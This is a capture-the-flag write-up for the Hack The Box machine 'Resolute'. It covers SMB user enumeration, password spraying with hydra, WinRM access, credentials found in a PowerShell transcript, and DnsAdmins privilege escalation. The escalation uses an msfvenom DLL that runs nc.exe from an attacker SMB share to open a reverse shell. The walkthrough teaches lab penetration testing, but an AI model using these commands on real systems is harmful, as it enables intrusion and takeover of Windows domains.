If you want to play this online target, you need to register the Hackthebox platform account first. See my previous article for the specific steps Introduction to nanny level registration and use of Hackthebox platform
introduce
Through this penetration, we can learn:
1. Use of rpccline tool
2. Use of enum4linux tools
3. The use of msfvenom tool further exposed veil. The exe file 360 generated by veil has the probability of not reporting poison
4.DnsAdmin user privilege vulnerability
Preliminary preparation
Change the hosts file and scan the ports. Note that this is the nmap fast scanning mode. Some ports may not be scanned. If the ports scanned by fast scanning do not break through
The - p parameter should be used as much as possible. For example, the ports of redis and winrm can't be scanned sometimes. You must use the - p parameter to scan the specified ports
nmap -A resolute > port
root@kali:~/Hackthebox/resolute# cat port Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 15:09 CST Nmap scan report for resolute (10.10.10.169) Host is up (0.17s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-14 07:17:43Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped
smb (Port 445), winrm (port 5986)
2. Collect information about SMB services and use enum4linux to collect information about SMB servers
-The U parameter enumerates the user list and displays relevant information
For more parameters, see enum4linux -h
root@kali:~# enum4linux -U resolute Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 18 18:50:20 2020 ========================== | Target Information | ========================== Target ........... resolute RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ================================================ | Enumerating Workgroup/Domain on resolute | ================================================ [E] Can't find workgroup/domain ================================= | Session Check on resolute | ================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server resolute allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name: ======================================= | Getting domain SID for resolute | ======================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: MEGABANK Domain Sid: S-1-5-21-1392959593-3013219662-3596683436 [+] Host is part of a domain (not a workgroup) ========================= | Users on resolute | ========================= Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null) index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null) index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null) index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null) index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null) index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null) index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null) index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123! index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null) index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null) index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null) index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null) index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null) index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null) index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null) index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null) index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null) index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null) index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null) index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[ryan] rid:[0x451] user:[marko] rid:[0x457] user:[sunita] rid:[0x19c9] user:[abigail] rid:[0x19ca] user:[marcus] rid:[0x19cb] user:[sally] rid:[0x19cc] user:[fred] rid:[0x19cd] user:[angela] rid:[0x19ce] user:[felicia] rid:[0x19cf] user:[gustavo] rid:[0x19d0] user:[ulf] rid:[0x19d1] user:[stevie] rid:[0x19d2] user:[claire] rid:[0x19d3] user:[paulo] rid:[0x19d4] user:[steve] rid:[0x19d5] user:[annette] rid:[0x19d6] user:[annika] rid:[0x19d7] user:[per] rid:[0x19d8] user:[claude] rid:[0x19d9] user:[melanie] rid:[0x2775] user:[zach] rid:[0x2776] user:[simon] rid:[0x2777] user:[naoki] rid:[0x2778] enum4linux complete on Sat Jan 18 18:50:44 2020
One piece of information is very important:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
Account marko, password Welcome123!, Log in using rpcclient.
rpcclient -U marko resolute
The password entered shows an error.
Get User permissions
1. Use this password to try to log in to other users. There are two methods: manually try or use hydra. The second method is used here.
hydra -L username.txt -p Welcome123! resolute
The password just now is the password of user melanie.
2. After obtaining the account password, try to log in to the SMB server. List the directory first.
root@kali:~/Hackthebox/resolute# smbclient -U melanie -L resolute
Enter WORKGROUP\melanie's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availableUse the following command to enter a shared folder of the SMB server.
smbclient -U melanie //resolute/<dirname>
After checking, I didn't find any valuable information.
3. Log in to Winrm (Windows remote management)
You need the tool evil-winrm.rb here. github address
Log in to Winrm
root@kali:~/Hackthebox/tools/evil-winrm# ruby evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> cd /Users
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 1/18/2020 3:28 AM ryanSo far, Users permission has been obtained. Note that there is also a user ryan in this directory.
Collect information
1. After obtaining the User permission, we should try to raise the permission. First, we should check the permissions of the current User.
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192The current user permissions are very common.
2. After knowing that the current user does not have any privileges, we should first focus on collecting information. The so-called collecting information is to browse the "suspicious" folders and files.
Make good use of the two parameters of the ls command:
-The force parameter displays all files, including hidden files.
-Hidden shows only hidden files.
*Evil-WinRM* PS C:\> ls -hidden
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/17/2020 5:52 PM 402653184 pagefile.sysNotice that there is a PSTranscripts folder, such as this non system built-in folder, and the file name is very attractive (this example contains the word script). Pay attention to it.
There is a txt document at the bottom of the folder
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txtOpen it and have a look. It's a log information file. I found important information.
Seems to be the password of ryan user Serv3r4Admin4cc123!
3. Continue to log in using evil winrm. View the permission group to which the user belongs
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
ryan user belongs to DnsAdmin group, baidu + Google DnsAdmin
Important: DnsAdmin security vulnerability (medium turn)
To put it simply, the DNS administrator (DnsAdmin) has read and write permissions on the DNS server, and can even tell the server to mount our DLL (the original refers to the ServerLevelPluginDll file) without
Verify the mounted path. The commands to mount are:
dnscmd.exe /config /serverlevelplugindll \pathtodll
Right raising
1. After learning from the previous experiments, we are naturally alert to the above description.
Here we need to use msfvenom to automatically generate the dll file of the reverse shell. Before that, complete the following steps:
(1) Download the reverse shell file nc.exe:
netcat official download address (over the wall)
netcat Baidu network disk address (extraction code: 6ksg)
(2) Quick setup of SMB server:
github Download
Run the command python3 setup.py install to install.
Generate a dll file to start the reverse shell. Here, use the windows/x64/exec module custom command to view the required parameters
msf5 payload(windows/x64/exec) > show options Module options (payload/windows/x64/exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
Only one CMD parameter is required.
Use the following command to generate custom commands.
msfvenom -p windows/x64/exec CMD='\\10.10.14.32\tools\nc.exe 10.10.14.32 6666 -e cmd.exe' -f dll > reverse.dll
2. Start smb service. There should be nc.exe and reverse.dll under the shared folder, and the folder name must be the file name set in msfvenom, here is tools.
root@kali:~/Hackthebox/resolute/tools# smbserver.py tools ./ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
3. Mount the dll file we have prepared. Because the command is executed remotely, the IP address or host name must be added after dnscmd.exe.
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.32\tools\reverse.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan\Documents>Restart dns Service
sc.exe \\resolute stop dns sc.exe \\resolute start dns
Viewing SMB logs
View port listening
The whole infiltration process is over. Obtained system permissions.
reference material
[0] reference article: https://blog.csdn.net/sdihvai/article/details/104031562
[7]github address: https://github.com/Hackplayers/evil-winrm
[9]DnsAdmin security vulnerability (medium turn): https://www.anquanke.com/post/id/86080
[10]netcat official download address (over the wall): https://eternallybored.org/misc/netcat/
[11]netcat Baidu network disk address: https://pan.baidu.com/s/15PkUoZYXHlBoD7LuV36PKQ
[12]github Download: https://github.com/SecureAuthCorp/impacket